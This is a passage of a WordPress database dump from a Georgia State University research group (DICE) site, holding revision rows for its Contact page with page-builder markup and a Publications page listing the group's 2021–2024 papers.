style-local-185-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"185-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-397 style-local-185-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-398-outer style-local-185-c4-outer\">\n <div data-colibri-id=\"185-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-398 style-local-185-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"185-c5\" class=\"h-global-transition-all h-heading style-399 style-local-185-c5 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-399 style-local-185-c5\">\n <!---->\n <!---->\n <h4 class=\"\">DICE</h4>\n </div>\n </div>\n <div data-colibri-id=\"185-c6\" class=\"h-global-transition-all h-heading style-400 style-local-185-c6 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-400 style-local-185-c6\">\n <!---->\n <!---->\n <h2 class=\"\">Contact Us</h2>\n </div>\n </div>\n <div data-colibri-id=\"185-c7\" class=\"h-text h-text-component style-401 style-local-185-c7 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>We are located on the 18th Floor of 25 Park Place at Georgia State University downtown campus. </p>\n <p>Phone: (404) 919-0757\n <br>Email: dice@cs.gsu.edu</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-406-outer style-local-185-c8-outer\">\n <div data-colibri-id=\"185-c8\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-406 style-local-185-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Contact','','inherit','closed','closed','','185-revision-v1','','','2022-03-18 20:45:31','2022-03-19 00:45:31','',185,'https://gsudice.dataconn.net/?p=587',0,'revision','',0),(593,1,'2022-03-18 20:50:02','2022-03-19 00:50:02','https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-2.webp','cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-2.webp','','inherit','open','closed','','cropped-eyj3ijoymdq4lcjoijoymdq4lcjzy29wzsi6imfwccj9-1-2-webp','','','2022-03-18 20:50:02','2022-03-19 00:50:02','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-2.webp',0,'attachment','image/webp',0),(594,1,'2022-03-18 20:50:37','2022-03-19 00:50:37','https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-2.webp','cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-2.webp','','inherit','open','closed','','cropped-cropped-eyj3ijoymdq4lcjoijoymdq4lcjzy29wzsi6imfwccj9-1-2-webp','','','2022-03-18 20:50:37','2022-03-19 00:50:37','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-2.webp',0,'attachment','image/webp',0),(595,1,'2022-03-18 20:50:42','2022-03-19 00:50:42','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}}}}},\"id\":\"185-c4\",\"parentId\":\"185-c3\",\"partialId\":185,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"185-c4\",\"index\":0,\"id\":\"185-c6\",\"partialId\":185,\"styleRef\":400,\"type\":\"content\",\"props\":{\"content\":\"Contact Us\"}},{\"name\":\"hop-text\",\"parentId\":\"185-c4\",\"index\":1,\"id\":\"185-c7\",\"partialId\":185,\"styleRef\":401,\"type\":\"content\",\"props\":{\"content\":\"<p>We are located on the 18th Floor of 25 Park Place at Georgia State University downtown campus. <\\/p><p>Phone: (404) 919-0757<br>Email: dice@cs.gsu.edu<\\/p>\"}}],\"styleRef\":398,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}}}}},\"id\":\"185-c8\",\"parentId\":\"185-c3\",\"partialId\":185,\"styleRef\":406,\"type\":\"content\"}],\"id\":\"185-c3\",\"parentId\":\"185-c2\",\"partialId\":185,\"styleRef\":397,\"type\":\"content\"}],\"id\":\"185-c2\",\"parentId\":\"185-c1\",\"partialId\":185,\"styleRef\":396,\"type\":\"content\",\"props\":{\"anchor\":false,\"name\":\"Content\",\"attrs\":{\"id\":\"content\"}}}],\"id\":\"185-c1\",\"partialId\":185,\"styleRef\":395,\"type\":\"content\"}','','','inherit','closed','closed','','546-revision-v1','','','2022-03-18 20:50:42','2022-03-19 00:50:42','',546,'https://gsudice.dataconn.net/?p=595',0,'revision','',0),(596,1,'2022-03-18 20:50:42','2022-03-19 00:50:42','<div data-colibri-id=\"185-c1\" class=\"style-395 style-local-185-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"185-c2\" id=\"content\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-396 style-local-185-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"185-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-397 style-local-185-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-398-outer style-local-185-c4-outer\">\n <div data-colibri-id=\"185-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-398 style-local-185-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"185-c6\" class=\"h-global-transition-all h-heading style-400 style-local-185-c6 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-400 style-local-185-c6\">\n <!---->\n <!---->\n <h2 class=\"\">Contact Us</h2>\n </div>\n </div>\n <div data-colibri-id=\"185-c7\" class=\"h-text h-text-component style-401 style-local-185-c7 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>We are located on the 18th Floor of 25 Park Place at Georgia State University downtown campus. </p>\n <p>Phone: (404) 919-0757\n <br>Email: dice@cs.gsu.edu</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-406-outer style-local-185-c8-outer\">\n <div data-colibri-id=\"185-c8\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-406 style-local-185-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Contact','','inherit','closed','closed','','185-revision-v1','','','2022-03-18 20:50:42','2022-03-19 00:50:42','',185,'https://gsudice.dataconn.net/?p=596',0,'revision','',0),(602,1,'2022-03-18 20:52:17','2022-03-19 00:52:17','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}}}}},\"id\":\"185-c4\",\"parentId\":\"185-c3\",\"partialId\":185,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"185-c4\",\"index\":0,\"id\":\"185-c5\",\"partialId\":185,\"styleRef\":400,\"type\":\"content\",\"props\":{\"content\":\"Contact Us\"}},{\"name\":\"hop-text\",\"parentId\":\"185-c4\",\"index\":1,\"id\":\"185-c6\",\"partialId\":185,\"styleRef\":401,\"type\":\"content\",\"props\":{\"content\":\"<p>We are located on the 18th Floor of 25 Park Place at the Georgia State University downtown campus. <\\/p><p>Phone: (404) 919-0757<br>Email: dice@cs.gsu.edu<\\/p>\"}}],\"styleRef\":398,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}}}}},\"id\":\"185-c7\",\"parentId\":\"185-c3\",\"partialId\":185,\"styleRef\":406,\"type\":\"content\"}],\"id\":\"185-c3\",\"parentId\":\"185-c2\",\"partialId\":185,\"styleRef\":397,\"type\":\"content\"}],\"id\":\"185-c2\",\"parentId\":\"185-c1\",\"partialId\":185,\"styleRef\":396,\"type\":\"content\",\"props\":{\"anchor\":false,\"name\":\"Content\",\"attrs\":{\"id\":\"content\"}}}],\"id\":\"185-c1\",\"partialId\":185,\"styleRef\":395,\"type\":\"content\"}','','','inherit','closed','closed','','546-revision-v1','','','2022-03-18 20:52:17','2022-03-19 00:52:17','',546,'https://gsudice.dataconn.net/?p=602',0,'revision','',0),(603,1,'2022-03-18 20:52:17','2022-03-19 00:52:17','<div data-colibri-id=\"185-c1\" class=\"style-395 style-local-185-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"185-c2\" id=\"content\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-396 style-local-185-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"185-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-397 style-local-185-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-398-outer style-local-185-c4-outer\">\n <div data-colibri-id=\"185-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-398 style-local-185-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"185-c5\" class=\"h-global-transition-all h-heading style-400 style-local-185-c5 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-400 style-local-185-c5\">\n <!---->\n <!---->\n <h2 class=\"\">Contact Us</h2>\n </div>\n </div>\n <div data-colibri-id=\"185-c6\" class=\"h-text h-text-component style-401 style-local-185-c6 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>We are located on the 18th Floor of 25 Park Place at the Georgia State University downtown campus. </p>\n <p>Phone: (404) 919-0757\n <br>Email: dice@cs.gsu.edu</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-406-outer style-local-185-c7-outer\">\n <div data-colibri-id=\"185-c7\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-406 style-local-185-c7 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Contact','','inherit','closed','closed','','185-revision-v1','','','2022-03-18 20:52:17','2022-03-19 00:52:17','',185,'https://gsudice.dataconn.net/?p=603',0,'revision','',0),(608,1,'2022-03-19 12:00:08','2022-03-19 16:00:08','<div data-colibri-id=\"608-c1\" class=\"style-413 style-local-608-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"608-c2\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-417 style-local-608-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"608-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-418 style-local-608-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-419-outer style-local-608-c4-outer\">\n <div data-colibri-id=\"608-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-419 style-local-608-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"608-c5\" class=\"h-text h-text-component style-420 style-local-608-c5 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p><strong>2024</strong></p>\n <p>Fariba Afrin Irany, Sundos Al Subhi, Rubenia Borge Flores, Chetan Tiwari. Algorithms to Reduce Biases in Disease Rate Estimates Caused by Data Suppression. <em>IAENG International Journal of Applied Mathematics</em>, 2024, 54 (5),\n pp.16.</p>\n <p>Ramisetty-Mikler, S., Willis, A. & Tiwari, C. Pre-pregnancy Weight and Racial-Ethnic Disparities in Pregnancy-Associated Conditions in the State of Georgia: A Population-Based Study. <em>J. Racial and Ethnic Health Disparities</em> (2024).</p>\n <p>S. N. S. Al Subhi, A. R. Mikler and M. M. Kubek, Constructing Co-Occurrence Graphs and Deriving Flood Ontologies for Enhanced Understanding, <em>2024 Second International Conference on Inventive Computing and Informatics (ICICI)</em>,\n Bangalore, India.</p>\n <p>\n <br>\n </p>\n <p><strong>2023</strong></p>\n <p>Mubashir, A., Ashok, A., Bourgeois, A. G., Chien, Y. T., Connors, M., Potdevin, E., et al. (2023). Muon flux variations measured by low-cost portable cosmic ray detectors and their correlation with space weather activity. <em>Journal of Geophysical Research: Space Physics</em>,\n 128, e2023JA031943.</p>\n <p>McDaniel EL, Akwafuo S, Urbanovsky J, Mikler AR.2023. Benchmarking a fast, satisficing vehicle routing algorithm for public health emergency planning and response: “Good Enough for Jazz”. PeerJ Computer Science</p>\n <p>Gwalani, H., Tiwari, C., O’Neill II, M. <em>et al.</em> Creating contiguous service areas around points of dispensing for resource distribution during bio-emergencies. <em>Geoinformatica.</em></p>\n <p>Arfa Mubashir, Xiaochun He, Ashwin Ashok, et al. Muon Flux Variation in Real-time and its Correlation with Space Weather Activity. <em> ESS Open Archive .</em> February 27, 2023.</p>\n <p>Daniel Gebregiorgis, Lawrence Morara Kiage, Chetan Tiwari, Suhasini Ramisetty-Mikler, Aster Gebrekirstos, Asfawossen Asrat, Susan Wanjiru, Emiru Birhane. A multi-disciplinary framework to combat climate-induced desert locus breeding,\n upsurges and outbreaks in eastern Africa. AGU Fall Meeting Abstracts, 2023\n <br>\n </p>\n <p>\n <br>\n </p>\n <p><strong>2022</strong></p>\n <p>Atkinson, S. F., Kala, A. K., & Tiwari, C. (2022). Cascading effects of COVID-19 on population mobility and air quality: An exploration including place characteristics using geovisualization. Geospatial Health, 17(s1).</p>\n <p>Angelique B.Willis, Mildred Addo, Lauren E.Yoder, Cassandra K. Johnson, Sydney L. Resler, Leticia J. Young, Elizabeth Armstrong-Mensah(2022). Individual and Community Level Factors Related to Sanitation, Water Quality, Treatment\n and Management in Rural Communities in Accra, Ghana: A Field Study Report.</p>\n <p>Parcells, R. 2022. Aedes Mosquito Early Warning System: Challenges Integrating Public Health Surveillance Data. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n <p>Schuh, E. 2022. Building a resilient energy grid: development of an urban-scale model for energy prediction. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n <p>Anand, A. 2022. Aedes Mosquito Early Warning System: Integrating Disparate Environmental Datasets. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n <p>Garland, R. 2022. GSU (Georgia State University) Contact Networks and Interventions. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n <p>McDaniel, Emma L; Henry Phan; Puneet Singh; Chetan Tiwari; and Armin R Mikler. 2022. Evaluating Potential Exposure Risk to Gastrointestinal Disease-Causing Specimens after Documented Wastewater Spills in Atlanta. Poster presented at:\n American Association of Geographers, Annual Meeting 2022.</p>\n <p>\n <br>\n </p>\n <p><strong>2021</strong></p>\n <p>Northeim, K., Tiwari, C., & Oppong, J. (2021). Surface ozone monitoring and policy: A geospatial decision support tool for suitable location of monitoring stations in urban areas. Environmental Science & Policy, 126, 48-59.</p>\n <p>Gwalani, H., Tiwari, C., & Mikler, A. R. (2021). Evaluation of heuristics for the p-median problem: Scale and spatial demand distribution. Computers, Environment and Urban Systems, 88, 101656.</p>\n <p>Torres, A. V., Tiwari, C., & Atkinson, S. F. (2021). Progress in ecosystem services research: A guide for scholars and practitioners. Ecosystem Services, 49, 101267.</p>\n <p>Northeim, K., Marks, C., & Tiwari, C. (2021). Evaluating spatial patterns of seasonal ozone exposure and incidence of respiratory emergency room visits in Dallas-Fort Worth. PeerJ, 9, e11066.</p>\n <p>Haynes, D., & Tiwari, C. (2021). Space-time Classification Index for Assessing COVID-19 Hotspots. medRxiv.</p>\n <p>Oppong, J., & Tiwari, C. (2021). GIS and Spatial Representations: Challenges and Missteps. In COVID-19 and Similar Futures (pp. 417-422). Springer, Cham.</p>\n <p>O’Neill, M., Poole, M., & Mikler, A. R. (2021). A Synergistic Approach to Data-Driven Response Planning. Disaster medicine and public health preparedness, 15(2), 232-238.</p>\n <p>Irany, F. A., Iyer, A., Flores, R. B., & Mikler, A. R. (2021). The Multi-phase spatial meta-heuristic algorithm for public health emergency transportation. arXiv preprint arXiv:2107.04125.</p>\n <p>Qian, W., Bhowmick, S., O’Neill, M., Ramisetty-Mikler, S., & Mikler, A. R. (2021). Applying a Probabilistic Infection Model for studying contagion processes in contact networks. Journal of Computational Science, 54, 101419.</p>\n <p>Gu, Q., Formby, D., Ji, S., Saltaformaggio, B., Bourgeois, A., & Beyah, R. A. (2021). This Hacker Knows Physics: Device Physics Aware Mimicry Attacks in Cyber-Physical Systems. IEEE Transactions on Dependable and Secure Computing.</p>\n <p>Huang, Y., Cai, Z., Pang, J., Xie, Z., & Bourgeois, A. G. (2021, June). Game Theory Based Privacy Protection for Context-Aware Services with Long-Term Time Series Data. In ICC 2021-IEEE International Conference on Communications\n (pp. 1-6). IEEE.</p>\n <p>Rosen, A., Levin, B., & Bourgeois, A. G. (2021, June). Autonomous Load Balancing in Distributed Hash Tables Using Churn and the Sybil Attack. In 2021 IEEE International Parallel and Distributed Processing Symposium Workshops (IPDPSW)\n (pp. 631-640). IEEE.</p>\n <p>Tharpe, B., Bourgeois, A. G., & Ashok, A. (2021, June). A do-it-yourself computer vision based robotic ball throw trainer. In Proceedings of the 19th Annual International Conference on Mobile Systems, Applications, and Services\n (pp. 505-506).</p>\n <p>Huang, Y., Li, W., Wang, J., Cai, Z., & Bourgeois, A. G. (2021). Privacy protection among three antithetic-parties for context-aware services. Journal of Network and Computer Applications, 191, 103115.</p>\n <p>Sidharthan, S., Ashok, A., & Bourgeois, A. (2021, October). Internet service via UAV: user centric comprehensive attack surface analysis. In Proceedings of the 12th ACM Wireless of the Students, by the Students, and for the Students\n (S3) Workshop (pp. 1-2).</p>\n <p>Younis, A. A., Sunderraman, R., Metzler, M., & Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.</p>\n <p>Ye, H., Yang, X., Takac, M., Sunderraman, R., & Ji, S. (2021). Improving text-to-image synthesis using contrastive learning. arXiv preprint arXiv:2107.02423.</p>\n <p>Abeysinghe, B., Shah, D., Freas, C., Harrison, R., & Sunderraman, R. (2021). POSLAN: Disentangling Chat with Positional and Language encoded Post Embeddings. arXiv preprint arXiv:2107.03529.</p>\n <p>Srimath, S., Ye, Y., Sarker, K., Sunderraman, R., & Ji, S. (2021, October). Human Activity Recognition from RGB Video Streams Using 1D-CNNs. In 2021 IEEE SmartWorld, Ubiquitous Intelligence & Computing, Advanced & Trusted\n Computing, Scalable Computing & Communications, Internet of People and Smart City Innovation (SmartWorld/SCALCOM/UIC/ATC/IOP/SCI) (pp. 295-302). IEEE.</p>\n <p>Younis, A. A., Sunderraman, R., Metzler, M., & Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.</p>\n <p>Kleinsasser, M., Tharpe, B., Akula, N., Tirumani, H., Sunderraman, R., & Bourgeois, A. G. (2022, January). Detecting and Predicting Sleep Activity using Biometric Sensor Data. In 2022 14th International Conference on COMmunication\n Systems & NETworkS (COMSNETS) (pp. 19-24). IEEE.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Publications','','publish','closed','closed','','publications','','','2024-11-07 14:48:27','2024-11-07 19:48:27','',126,'https://gsudice.dataconn.net/?page_id=608',0,'page','',0),(610,1,'2022-03-19 12:00:08','2022-03-19 16:00:08','','Publications','','inherit','closed','closed','','608-revision-v1','','','2022-03-19 12:00:08','2022-03-19 16:00:08','',608,'https://gsudice.dataconn.net/?p=610',0,'revision','',0),(612,1,'2022-03-19 12:02:31','2022-03-19 16:02:31','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"id\":\"608-c4\",\"parentId\":\"608-c3\",\"partialId\":608,\"children\":[{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"608-c4\",\"index\":0,\"id\":\"608-c5\",\"partialId\":608,\"styleRef\":420,\"type\":\"content\",\"props\":{\"content\":\"<p><strong>2024<\\/strong><\\/p><p>Fariba Afrin Irany, Sundos Al Subhi, Rubenia Borge Flores, Chetan Tiwari. Algorithms to Reduce Biases in Disease Rate Estimates Caused by Data Suppression. <em>IAENG International Journal of Applied Mathematics<\\/em>, 2024, 54 (5), pp.16.<\\/p><p>Ramisetty-Mikler, S., Willis, A. & Tiwari, C. Pre-pregnancy Weight and Racial-Ethnic Disparities in Pregnancy-Associated Conditions in the State of Georgia: A Population-Based Study. <em>J. Racial and Ethnic Health Disparities<\\/em> (2024).<\\/p><p>S. N. S. Al Subhi, A. R. Mikler and M. M. Kubek, Constructing Co-Occurrence Graphs and Deriving Flood Ontologies for Enhanced Understanding, <em>2024 Second International Conference on Inventive Computing and Informatics (ICICI)<\\/em>, Bangalore, India.<\\/p><p><br><\\/p><p><strong>2023<\\/strong><\\/p><p>Mubashir, A., Ashok, A., Bourgeois, A. G., Chien, Y. T., Connors, M., Potdevin, E., et al. (2023). Muon flux variations measured by low-cost portable cosmic ray detectors and their correlation with space weather activity. <em>Journal of Geophysical Research: Space Physics<\\/em>, 128, e2023JA031943.<\\/p><p>McDaniel EL, Akwafuo S, Urbanovsky J, Mikler AR.2023. Benchmarking a fast, satisficing vehicle routing algorithm for public health emergency planning and response: \\u201cGood Enough for Jazz\\u201d. PeerJ Computer Science<\\/p><p>Gwalani, H., Tiwari, C., O\\u2019Neill II, M. <em>et al.<\\/em> Creating contiguous service areas around points of dispensing for resource distribution during bio-emergencies. <em>Geoinformatica.<\\/em><\\/p><p>Arfa Mubashir, Xiaochun He, Ashwin Ashok, et al. Muon Flux Variation in Real-time and its Correlation with Space Weather Activity. <em> ESS Open Archive .<\\/em> February 27, 2023.<\\/p><p>Daniel Gebregiorgis, Lawrence Morara Kiage, Chetan Tiwari, Suhasini Ramisetty-Mikler, Aster Gebrekirstos, Asfawossen Asrat, Susan Wanjiru, Emiru Birhane. A multi-disciplinary framework to combat climate-induced desert locus breeding, upsurges and outbreaks in eastern Africa. AGU Fall Meeting Abstracts, 2023<br><\\/p><p><br><\\/p><p><strong>2022<\\/strong><\\/p><p>Atkinson, S. F., Kala, A. K., & Tiwari, C. (2022). Cascading effects of COVID-19 on population mobility and air quality: An exploration including place characteristics using geovisualization. Geospatial Health, 17(s1).<\\/p><p>Angelique B.Willis, Mildred Addo, Lauren E.Yoder, Cassandra K. Johnson, Sydney L. Resler, Leticia J. Young, Elizabeth Armstrong-Mensah(2022). Individual and Community Level Factors Related to Sanitation, Water Quality, Treatment and Management in Rural Communities in Accra, Ghana: A Field Study Report.<\\/p><p>Parcells, R. 2022. Aedes Mosquito Early Warning System: Challenges Integrating Public Health Surveillance Data. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>Schuh, E. 2022. Building a resilient energy grid: development of an urban-scale model for energy prediction. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>Anand, A. 2022. Aedes Mosquito Early Warning System: Integrating Disparate Environmental Datasets. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>Garland, R. 2022. GSU (Georgia State University) Contact Networks and Interventions. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>McDaniel, Emma L; Henry Phan; Puneet Singh; Chetan Tiwari; and Armin R Mikler. 2022. Evaluating Potential Exposure Risk to Gastrointestinal Disease-Causing Specimens after Documented Wastewater Spills in Atlanta. Poster presented at: American Association of Geographers, Annual Meeting 2022.<\\/p><p><br><\\/p><p><strong>2021<\\/strong><\\/p><p>Northeim, K., Tiwari, C., & Oppong, J. (2021). Surface ozone monitoring and policy: A geospatial decision support tool for suitable location of monitoring stations in urban areas. Environmental Science & Policy, 126, 48-59.<\\/p><p>Gwalani, H., Tiwari, C., & Mikler, A. R. (2021). Evaluation of heuristics for the p-median problem: Scale and spatial demand distribution. Computers, Environment and Urban Systems, 88, 101656.<\\/p><p>Torres, A. V., Tiwari, C., & Atkinson, S. F. (2021). Progress in ecosystem services research: A guide for scholars and practitioners. Ecosystem Services, 49, 101267.<\\/p><p>Northeim, K., Marks, C., & Tiwari, C. (2021). Evaluating spatial patterns of seasonal ozone exposure and incidence of respiratory emergency room visits in Dallas-Fort Worth. PeerJ, 9, e11066.<\\/p><p>Haynes, D., & Tiwari, C. (2021). Space-time Classification Index for Assessing COVID-19 Hotspots. medRxiv.<\\/p><p>Oppong, J., & Tiwari, C. (2021). GIS and Spatial Representations: Challenges and Missteps. In COVID-19 and Similar Futures (pp. 417-422). Springer, Cham.<\\/p><p>O\\u2019Neill, M., Poole, M., & Mikler, A. R. (2021). A Synergistic Approach to Data-Driven Response Planning. Disaster medicine and public health preparedness, 15(2), 232-238.<\\/p><p>Irany, F. A., Iyer, A., Flores, R. B., & Mikler, A. R. (2021). The Multi-phase spatial meta-heuristic algorithm for public health emergency transportation. arXiv preprint arXiv:2107.04125.<\\/p><p>Qian, W., Bhowmick, S., O\\u2019Neill, M., Ramisetty-Mikler, S., & Mikler, A. R. (2021). Applying a Probabilistic Infection Model for studying contagion processes in contact networks. Journal of Computational Science, 54, 101419.<\\/p><p>Gu, Q., Formby, D., Ji, S., Saltaformaggio, B., Bourgeois, A., & Beyah, R. A. (2021). This Hacker Knows Physics: Device Physics Aware Mimicry Attacks in Cyber-Physical Systems. IEEE Transactions on Dependable and Secure Computing.<\\/p><p>Huang, Y., Cai, Z., Pang, J., Xie, Z., & Bourgeois, A. G. (2021, June). Game Theory 